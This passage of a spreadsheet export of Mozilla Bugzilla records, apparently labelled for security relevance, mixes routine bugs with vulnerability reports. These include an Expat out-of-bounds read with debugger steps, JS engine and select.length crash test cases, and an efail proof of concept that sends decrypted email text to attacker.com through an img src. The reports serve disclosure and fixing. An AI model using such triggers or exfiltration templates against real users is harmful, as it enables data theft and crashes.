495:     nsScannerIterator fromBegin(aSrcStart);
496:     
497:     copy_multifragment_string(fromBegin, aSrcEnd, writer);
498:   }
With the attached POC, this bug causes out-of-bounds reading in AppendErrorPointer. This occurs because nsExpatDriver::ConsumeToken, line 1126, updates its |mExpatParser.mPosition.col| member to account for the number of just-consumed characters (|consumed|) [1], Then it calls AppendUnicodeTo to append those characters to |mLastLine| (line 1139):
1115:     uint32_t consumed;
1116:     ParseBuffer(buffer, length, noMoreBuffers, &amp;consumed);
1117:     if (consumed &gt; 0) {
1118:       nsScannerIterator oldExpatPosition = currentExpatPosition;
1119:       currentExpatPosition.advance(consumed);
1120: 
1121:       // We consumed some data, we want to store the last line of data that
1122:       // was consumed in case we run into an error (to show the line in which
1123:       // the error occurred).
1124: 
1125:       // The length of the last line that Expat has parsed.
1126:       XML_Size lastLineLength = XML_GetCurrentColumnNumber(mExpatParser);
1127: 
1128:       if (lastLineLength &lt;= consumed) {
1129:         // The length of the last line was less than what expat consumed, so
1130:         // there was at least one line break in the consumed data. Store the
1131:         // last line until the point where we stopped parsing.
1132:         nsScannerIterator startLastLine = currentExpatPosition;
1133:         startLastLine.advance(-((ptrdiff_t)lastLineLength));
1134:         CopyUnicodeTo(startLastLine, currentExpatPosition, mLastLine);
1135:       }
1136:       else {
1137:         // There was no line break in the consumed data, append the consumed
1138:         // data.
1139:         AppendUnicodeTo(oldExpatPosition, currentExpatPosition, mLastLine);
1140:       }
1141:     }
But this fails because the resulting string is longer than the maximum allowed by nsString (0x3ffffff9, enforced by nsTSubstring_CharT::MutatePrep). Because AppendUnicodeTo doesn't return status, ConsumeToken doesn't learn about this failure, and so doesn't correct |mPosition| to account for it. Thus, |mPosition| indexes data that's beyond the end of |mLastLine|. ConsumeToken then plows ahead, calling nsExpatDriver::HandleError (line 1184):
1160:     if (NS_FAILED(mInternalState)) {
1161:       if (XML_GetErrorCode(mExpatParser) != XML_ERROR_NONE) {
1162:         NS_ASSERTION(mInternalState == NS_ERROR_HTMLPARSER_STOPPARSING,
1163:                      "Unexpected error");
...
1184:         HandleError();
1185:       }
1186: 
1187:       return mInternalState;
1188:     }
which calls XML_GetCurrentColumnNumber (line 946):
884: nsresult
885: nsExpatDriver::HandleError()
886: {
887:   int32_t code = XML_GetErrorCode(mExpatParser);
...
945:   // Adjust the column number so that it is one based rather than zero based.
946:   uint32_t colNumber = XML_GetCurrentColumnNumber(mExpatParser) + 1;
947:   uint32_t lineNumber = XML_GetCurrentLineNumber(mExpatParser);
948: 
949:   nsAutoString errorText;
950:   CreateErrorText(description.get(), XML_GetBase(mExpatParser), lineNumber,
951:                   colNumber, errorText);
952: 
953:   NS_ASSERTION(mSink, "no sink?");
which reads the updated |mPosition| member. Then HandleError passes the resulting (out-of-bounds) value to AppendErrorPointer:
954: 
955:   nsAutoString sourceText(mLastLine);
956:   AppendErrorPointer(colNumber, mLastLine.get(), sourceText);
which then reads from the out-of-bounds locations in |mLastLine| (line 868):
856: static nsresult
857: AppendErrorPointer(const int32_t aColNumber,
858:                    const char16_t *aSourceLine,
859:                    nsString&amp; aSourceString)
860: {
861:   aSourceString.Append(char16_t('\n'));
862: 
863:   // Last character will be '^'.
864:   int32_t last = aColNumber - 1;
865:   int32_t i;
866:   uint32_t minuses = 0;
867:   for (i = 0; i &lt; last; ++i) {
868:     if (aSourceLine[i] == '\t') {
869:       // Since this uses |white-space: pre;| a tab stop equals 8 spaces.
870:       uint32_t add = 8 - (minuses % 8);
871:       aSourceString.AppendASCII("--------", add);
872:       minuses += add;
873:     }
874:     else {
875:       aSourceString.Append(char16_t('-'));
876:       ++minuses;
877:     }
878:   }
879:   aSourceString.Append(char16_t('^'));
880: 
881:   return NS_OK;
882: }
Since the read is used only to decide what to put into the error string |aSourceString|, there is no meaningful data leak.
To use the POC, run FF 42.0 Win64 and attach a debugger to it. Set a breakpoint on nsExpatDriver line 1118 with the condition |consumed==0x5f|, then load the POC. When the BP fires, notice how line 1126 updates |mExpatParser.mPosition.col| to 0x4000000d. Then step to line 1139 and notice that |oldLength| is 0x3fffffae, and that the call to SetLength fails, leaving |aDest| with length 0x3fffffae. Step out, and see that |mLastLine| is also thus 0x3fffffae characters long. Step past lines 1160-1182 (which append one more character to mLastLine, which append succeeds because the resulting length doesn't exceeed nsAString's limit), then step into HandleError. Notice |colNumber| at line 946 is 0x4000000e. Step into AppendErrorPointer, noticing that line 864 assigns 0x4000000d to |last|. Examine |aSourceLine [last-1]| and notice it's inaccessible memory (or sometimes uninitialized memory). Let execution proceed and watch the probable read-access violation crash. It might take a minute or two to crash because AppendErrorPointer appends one character at a time to the error message string.
(Note that the POC has the invalid character 0x1a following "&lt;/text&gt;", which is necessary to cause the parse error that causes HandleError to be called).
[1] Yes, |XML_GetCurrentColumnNumber(mExpatParser)| updates |mExpatParser.mPosition.col|.</t>
        </is>
      </c>
      <c r="X368" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" t="n">
        <v>1066790</v>
      </c>
      <c r="B369" t="inlineStr">
        <is>
          <t>2014-09-12 12:40:50 -0700</t>
        </is>
      </c>
      <c r="C369" t="inlineStr">
        <is>
          <t>make repo-menu stay open when right-clicking and checking</t>
        </is>
      </c>
      <c r="D369" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:20 -0700</t>
        </is>
      </c>
      <c r="E369" t="n">
        <v>1</v>
      </c>
      <c r="F369" t="n">
        <v>1</v>
      </c>
      <c r="G369" t="n">
        <v>7</v>
      </c>
      <c r="H369" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I369" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J369" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K369" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L369" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M369" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N369" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P369" t="inlineStr"/>
      <c r="Q369" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R369" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S369" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T369" t="n">
        <v>1</v>
      </c>
      <c r="U369" t="n">
        <v>0</v>
      </c>
      <c r="V369" t="n">
        <v>3</v>
      </c>
      <c r="W369" t="inlineStr">
        <is>
          <t>new repo menu closes too easily.</t>
        </is>
      </c>
      <c r="X369" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" t="n">
        <v>693144</v>
      </c>
      <c r="B370" t="inlineStr">
        <is>
          <t>2011-10-09 04:29:06 -0700</t>
        </is>
      </c>
      <c r="C370" t="inlineStr">
        <is>
          <t>Crash [@ js::mjit::EnterMethodJIT] with typed array and TI</t>
        </is>
      </c>
      <c r="D370" t="inlineStr">
        <is>
          <t>2013-01-19 13:51:59 -0800</t>
        </is>
      </c>
      <c r="E370" t="n">
        <v>1</v>
      </c>
      <c r="F370" t="n">
        <v>1</v>
      </c>
      <c r="G370" t="n">
        <v>3</v>
      </c>
      <c r="H370" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I370" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J370" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K370" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L370" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M370" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N370" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O370" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P370" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q370" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R370" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S370" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T370" t="n">
        <v>1</v>
      </c>
      <c r="U370" t="n">
        <v>0</v>
      </c>
      <c r="V370" t="n">
        <v>9</v>
      </c>
      <c r="W370" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision b4da2d439cbc (options -m -n -a):
function f() {
  var oa = [];
  for (var i = 0; i &lt; 8; ++i) {
    var o = {};
    oa[(new Int32Array(ArrayBuffer.prototype).length)] = o;
  }
}
f();
This also affects aurora. As the -n switch (TI) seems to be required, I assume it does not affect beta/release.
Backtrace from m-c debug build:
==3713== Invalid write of size 8
==3713==    at 0x403A464: ???
==3713==    by 0x6E6C51: js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) (MethodJIT.cpp:884)
==3713==    by 0x6E6E71: CheckStackAndEnterMethodJIT(JSContext*, js::StackFrame*, void*, bool) (MethodJIT.cpp:945)
==3713==    by 0x6E6FC1: js::mjit::JaegerShotAtSafePoint(JSContext*, void*, bool) (MethodJIT.cpp:972)
==3713==    by 0x502930: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2174)
[...]
==3713==  Address 0xffc4000006d07278 is not stack'd, malloc'd or (recently) free'd
(gdb) x /2i $pc
=&gt; 0x7ffff7f624c0:      mov    %r10,(%r9,%r12,8)
   0x7ffff7f624c4:      mov    0x70(%rbx),%r12
(gdb) info registers r9 r10 r12
r9             0x7ffff6007278   140737320612472
r10            0xfffbfffff6009230       -1125900074577360
r12            0xfff8800000000000       -2111062325329920</t>
        </is>
      </c>
      <c r="X370" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="371">
      <c r="A371" t="n">
        <v>159220</v>
      </c>
      <c r="B371" t="inlineStr">
        <is>
          <t>2002-07-24 14:11:14 -0700</t>
        </is>
      </c>
      <c r="C371" t="inlineStr">
        <is>
          <t>Clicking on "Window" menu makes mozilla crash on a 64 bit OS</t>
        </is>
      </c>
      <c r="D371" t="inlineStr">
        <is>
          <t>2008-07-31 04:17:45 -0700</t>
        </is>
      </c>
      <c r="E371" t="n">
        <v>1</v>
      </c>
      <c r="F371" t="n">
        <v>1</v>
      </c>
      <c r="G371" t="n">
        <v>2</v>
      </c>
      <c r="H371" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I371" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J371" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K371" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L371" t="inlineStr">
        <is>
          <t>DEC</t>
        </is>
      </c>
      <c r="M371" t="inlineStr">
        <is>
          <t>OSF/1</t>
        </is>
      </c>
      <c r="N371" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P371" t="inlineStr">
        <is>
          <t>fix in hand</t>
        </is>
      </c>
      <c r="Q371" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R371" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S371" t="inlineStr">
        <is>
          <t>mozilla1.1beta</t>
        </is>
      </c>
      <c r="T371" t="n">
        <v>1</v>
      </c>
      <c r="U371" t="n">
        <v>0</v>
      </c>
      <c r="V371" t="n">
        <v>18</v>
      </c>
      <c r="W371" t="inlineStr">
        <is>
          <t>Mozilla crashed when I hit the Window menu in the browser. This happes with
the trunk build as well as Mozilla 1.1 beta release.
The checkin through revision 1.7  to "nsWindowDataSource.cpp"  treats 
pointers to be 32 bits, which causes trouble on a 64 bit OS.
One such example is  
nsISupportsKey key(window);   has been changed to                              
nsPRUint32Key key(NS_PTR_TO_INT32(window)); 
I hit the bug when closure-&gt;resultWindow   is stuffed with 32 bits
closure-&gt;resultWindow = NS_STATIC_CAST(nsIXULWindow*,
NS_INT32_TO_PTR(thisKey-&gt;GetValue()));
This blocks the release of Mozilla 1.1 beta on Tru64 UNIX.
I suggest this to be changed to work on 64 bit OS.</t>
        </is>
      </c>
      <c r="X371" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="372">
      <c r="A372" t="n">
        <v>1419957</v>
      </c>
      <c r="B372" t="inlineStr">
        <is>
          <t>2017-11-22 14:25:08 -0800</t>
        </is>
      </c>
      <c r="C372" t="inlineStr">
        <is>
          <t>Remove things that are unused now pulse_actions is no more</t>
        </is>
      </c>
      <c r="D372" t="inlineStr">
        <is>
          <t>2017-12-05 14:49:48 -0800</t>
        </is>
      </c>
      <c r="E372" t="n">
        <v>1</v>
      </c>
      <c r="F372" t="n">
        <v>1</v>
      </c>
      <c r="G372" t="n">
        <v>7</v>
      </c>
      <c r="H372" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I372" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J372" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K372" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L372" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M372" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N372" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P372" t="inlineStr"/>
      <c r="Q372" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R372" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S372" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T372" t="n">
        <v>1</v>
      </c>
      <c r="U372" t="n">
        <v>0</v>
      </c>
      <c r="V372" t="n">
        <v>11</v>
      </c>
      <c r="W372" t="inlineStr">
        <is>
          <t>Pulse actions was decommissioned in bug 1379172.
I've lost track of exactly what Treeherder pieces were used to support it, but I think there might have been Pulse messages sent out that are no longer required etc.</t>
        </is>
      </c>
      <c r="X372" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="373">
      <c r="A373" t="n">
        <v>1871214</v>
      </c>
      <c r="B373" t="inlineStr">
        <is>
          <t>2023-12-20 21:27:31 -0800</t>
        </is>
      </c>
      <c r="C373" t="inlineStr">
        <is>
          <t>Android- Webshare dialog hides fullscreen notification lead to spoof</t>
        </is>
      </c>
      <c r="D373" t="inlineStr">
        <is>
          <t>2024-09-23 05:18:48 -0700</t>
        </is>
      </c>
      <c r="E373" t="n">
        <v>1</v>
      </c>
      <c r="F373" t="n">
        <v>1</v>
      </c>
      <c r="G373" t="n">
        <v>2</v>
      </c>
      <c r="H373" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I373" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J373" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K373" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L373" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M373" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N373" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P373" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [group4][qa-triaged] [adv-main126+]</t>
        </is>
      </c>
      <c r="Q373" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R373" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S373" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T373" t="n">
        <v>1</v>
      </c>
      <c r="U373" t="n">
        <v>0</v>
      </c>
      <c r="V373" t="n">
        <v>26</v>
      </c>
      <c r="W373" t="inlineStr">
        <is>
          <t>Created attachment 9369784
document_6273567736090069881.mp4
I found a vulnerability in firefox android where a webshare dialog can cover fullscreen notifications which can lead to spoofs. 
steps to produce
1. open http://103.186.0.20/webshare.html or webshare.html
2. double tap on button
OS: Android 12 (Samsung M31)</t>
        </is>
      </c>
      <c r="X373" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="374">
      <c r="A374" t="n">
        <v>1457721</v>
      </c>
      <c r="B374" t="inlineStr">
        <is>
          <t>2018-04-28 13:02:37 -0700</t>
        </is>
      </c>
      <c r="C374" t="inlineStr">
        <is>
          <t>fix efail PoC 3: Leaking plaintext through src attribute</t>
        </is>
      </c>
      <c r="D374" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:07 -0800</t>
        </is>
      </c>
      <c r="E374" t="n">
        <v>1</v>
      </c>
      <c r="F374" t="n">
        <v>1</v>
      </c>
      <c r="G374" t="n">
        <v>2</v>
      </c>
      <c r="H374" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I374" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J374" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K374" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L374" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M374" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N374" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P374" t="inlineStr"/>
      <c r="Q374" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R374" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S374" t="inlineStr">
        <is>
          <t>Thunderbird 61.0</t>
        </is>
      </c>
      <c r="T374" t="n">
        <v>1</v>
      </c>
      <c r="U374" t="n">
        <v>0</v>
      </c>
      <c r="V374" t="n">
        <v>10</v>
      </c>
      <c r="W374" t="inlineStr">
        <is>
          <t>Created attachment 8971817
bug1419417_efail_src_break.patch
+++ This bug was initially created as a clone of Bug #1419417 +++
As described in bug 1419417 comment 1:
-------------------------------------------------------------
*Proof of concept 3: Leaking plaintext through src attribute*
-------------------------------------------------------------
Prerequisites:
- victim reads messages in HTML
- victim allows remote content (further attack variants possible, see below)
Attack:
Another variant of this attack is to use the HTML src attribute, for example, for invisible iframes or image tags to leak the plaintext:
multipart/mixed
   |--- Content-Type: text/html
   |    &lt;img src='https://attacker.com/
   |--- Content-Type: multipart/encrypted
   |--- Content-Type: application/pkcs7-mime
   +--- Content-Type: text/html
        '&gt;
An email sample can be found in attachment 8930486.</t>
        </is>
      </c>
      <c r="X374" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" t="n">
        <v>1173568</v>
      </c>
      <c r="B375" t="inlineStr">
        <is>
          <t>2015-06-10 15:07:21 -0700</t>
        </is>
      </c>
      <c r="C375" t="inlineStr">
        <is>
          <t>Tiles Campaign: "Cars.com_DT v1"</t>
        </is>
      </c>
      <c r="D375" t="inlineStr">
        <is>
          <t>2015-07-14 11:58:03 -0700</t>
        </is>
      </c>
      <c r="E375" t="n">
        <v>1</v>
      </c>
      <c r="F375" t="n">
        <v>1</v>
      </c>
      <c r="G375" t="n">
        <v>6</v>
      </c>
      <c r="H375" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I375" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J375" t="inlineStr">
        <is>
          <t>Traffic</t>
        </is>
      </c>
      <c r="K375" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P375" t="inlineStr">
        <is>
          <t>.?</t>
        </is>
      </c>
      <c r="Q375" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R375" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S375" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T375" t="n">
        <v>1</v>
      </c>
      <c r="U375" t="n">
        <v>0</v>
      </c>
      <c r="V375" t="n">
        <v>9</v>
      </c>
      <c r="W375" t="inlineStr">
        <is>
          <t>Created attachment 8620632
Carscom_creative 6.10.15.zip
Ed, 
Hoping to get the below live by 6/14!
Thanks for all your help,
-A
Campaign: Cars.com_DT v1
Tile Type: Directory
Flight takeover-days: 
 - 6/14/2015 - 6/17/2015
 - 6/26/2015 - 6/27/2015
 - 7/01/2015 - 7/02/2015
Countries/ Locale: United States - EN
Cover Image: Carscom_DT_rollover.png
Rollover Image: Carscom_DT_static.png
URL: http://www.cars.com/for-sale/?aff=allweb&amp;cmp=mozilla</t>
        </is>
      </c>
      <c r="X375" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="376">
      <c r="A376" t="n">
        <v>1439019</v>
      </c>
      <c r="B376" t="inlineStr">
        <is>
          <t>2018-02-16 14:54:44 -0800</t>
        </is>
      </c>
      <c r="C376" t="inlineStr">
        <is>
          <t>write script to compare data in two environments</t>
        </is>
      </c>
      <c r="D376" t="inlineStr">
        <is>
          <t>2018-02-22 09:44:09 -0800</t>
        </is>
      </c>
      <c r="E376" t="n">
        <v>1</v>
      </c>
      <c r="F376" t="n">
        <v>1</v>
      </c>
      <c r="G376" t="n">
        <v>4</v>
      </c>
      <c r="H376" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I376" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J376" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K376" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N376" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P376" t="inlineStr"/>
      <c r="Q376" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R376" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S376" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T376" t="n">
        <v>1</v>
      </c>
      <c r="U376" t="n">
        <v>0</v>
      </c>
      <c r="V376" t="n">
        <v>5</v>
      </c>
      <c r="W376" t="inlineStr">
        <is>
          <t>We're building a new infrastructure and Socorro is very complex with non-trivial and very stateful data flows. One of the things we ask ourselves is, "Is the new infrastructure producing the same data as the old one?"
This question is hard to ask specifically since there's a lot of data involved and it has shapes and timeliness factors. It's also really hard to answer for exactly the same reasons.
This bug covers writing a script that uses existing APIs in the webapp to compare data generated by two environments and show where they differ.</t>
        </is>
      </c>
      <c r="X376" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="377">
      <c r="A377" t="n">
        <v>460713</v>
      </c>
      <c r="B377" t="inlineStr">
        <is>
          <t>2008-10-19 20:20:02 -0700</t>
        </is>
      </c>
      <c r="C377" t="inlineStr">
        <is>
          <t>[FIX]Memory exhaustion setting HTMLSelect.length() [GSEC-TZO-26-2009]</t>
        </is>
      </c>
      <c r="D377" t="inlineStr">
        <is>
          <t>2009-07-21 15:56:54 -0700</t>
        </is>
      </c>
      <c r="E377" t="n">
        <v>1</v>
      </c>
      <c r="F377" t="n">
        <v>1</v>
      </c>
      <c r="G377" t="n">
        <v>3</v>
      </c>
      <c r="H377" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I377" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J377" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K377" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L377" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M377" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N377" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P377" t="inlineStr">
        <is>
          <t>[sg:dos][hold disclosure, see comment 40]</t>
        </is>
      </c>
      <c r="Q377" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R377" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S377" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T377" t="n">
        <v>1</v>
      </c>
      <c r="U377" t="n">
        <v>0</v>
      </c>
      <c r="V377" t="n">
        <v>54</v>
      </c>
      <c r="W377" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Possible Integer miscaluclation in select.length()
Triggers huge memory allocations and then first and second chance access violations.
Reproducible: Always
Steps to Reproduce:
1. open attachement
2. click on POC
3.
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=056ca0b0 ecx=00000000 edx=00290040 esi=069a7d8c edi=00000000
eip=605eea6b esp=0013e378 ebp=0013e5c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll - 
xul!NS_NewLocalFile_P+0xddb:
605eea6b 8b7718          mov     esi,dword ptr [edi+18h] ds:0023:00000018=????????
0:000&gt; !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
FAULTING_IP: 
xul!NS_NewLocalFile_P+ddb
605eea6b 8b7718          mov     esi,dword ptr [edi+18h]
EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 605eea6b (xul!NS_NewLocalFile_P+0x00000ddb)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000018
Attempt to read from address 00000018
FAULTING_THREAD:  00000998
DEFAULT_BUCKET_ID:  APPLICATION_FAULT
PROCESS_NAME:  firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".
READ_ADDRESS:  00000018 
BUGCHECK_STR:  ACCESS_VIOLATION
NTGLOBALFLAG:  70
APPLICATION_VERIFIER_FLAGS:  0
LAST_CONTROL_TRANSFER:  from 00000000 to 605eea6b
STACK_TEXT:  
0013e5c8 00000000 00000000 00000000 7c809a69 xul!NS_NewLocalFile_P+0xddb
FOLLOWUP_IP: 
xul!NS_NewLocalFile_P+ddb
605eea6b 8b7718          mov     esi,dword ptr [edi+18h]
SYMBOL_STACK_INDEX:  0
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: xul
IMAGE_NAME:  xul.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  48dae678
SYMBOL_NAME:  xul!NS_NewLocalFile_P+ddb
STACK_COMMAND:  ~0s ; kb
FAILURE_BUCKET_ID:  ACCESS_VIOLATION_xul!NS_NewLocalFile_P+ddb
BUCKET_ID:  ACCESS_VIOLATION_xul!NS_NewLocalFile_P+ddb
Followup: MachineOwner
--------
0:000&gt; k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
0013e5c8 00000000 xul!NS_NewLocalFile_P+0xddb
0:000&gt; g
(eb4.998): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=056ca0b0 ecx=00000000 edx=00290040 esi=069a7d8c edi=00000000
eip=605eea6b esp=0013e378 ebp=0013e5c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
xul!NS_NewLocalFile_P+0xddb:
605eea6b 8b7718          mov     esi,dword ptr [edi+18h] ds:0023:00000018=????????</t>
        </is>
      </c>
      <c r="X377" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="378">
      <c r="A378" t="n">
        <v>648100</v>
      </c>
      <c r="B378" t="inlineStr">
        <is>
          <t>2011-04-06 13:36:42 -0700</t>
        </is>
      </c>
      <c r="C378" t="inlineStr">
        <is>
